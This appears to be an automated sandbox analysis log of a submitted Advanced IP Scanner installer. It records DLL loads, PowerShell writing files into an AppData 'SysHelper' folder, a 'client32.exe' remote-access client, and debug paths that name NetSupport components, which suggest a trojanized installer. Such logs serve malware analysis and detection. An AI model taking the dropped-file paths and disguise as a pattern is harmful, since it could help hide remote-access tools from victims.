Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Advanced IP Scanner for Windows.lnk.1.dr

LNK file: ..\..\..\..\..\..\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Roaming\SysHelper\nsm_vpro.ini

Jump to behavior

Reads the Windows registered owner settings

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Executable creates window controls seldom found in malware

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

Window found: window name: TSelectLanguageForm

Jump to behavior

Found GUI installer (many successful clicks)

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Automated click: Next

Uses Rich Edit Controls

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

PE / OLE file has a valid certificate

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: certificate valid

Submission file is bigger than most known malware samples

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static file information: File size 21426168 > 1048576

Uses new MSVCR Dlls

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dll

Jump to behavior

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.3641013558.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.2161613841.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2250587498.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: is-50T4N.tmp.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: is-3DFK3.tmp.1.dr
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: is-7T7KO.tmp.1.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: is-G1AVJ.tmp.1.dr
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb- source: powershell.exe, 00000005.00000002.2183755399.0000000009739000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: is-37BEP.tmp.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: is-8NFDN.tmp.1.dr
Source:	Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: is-UUUMK.tmp.1.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: is-JD615.tmp.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: is-B6942.tmp.1.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: is-GO656.tmp.1.dr
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.3640696610.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.2161392777.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2249977529.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: is-MLS3P.tmp.1.dr
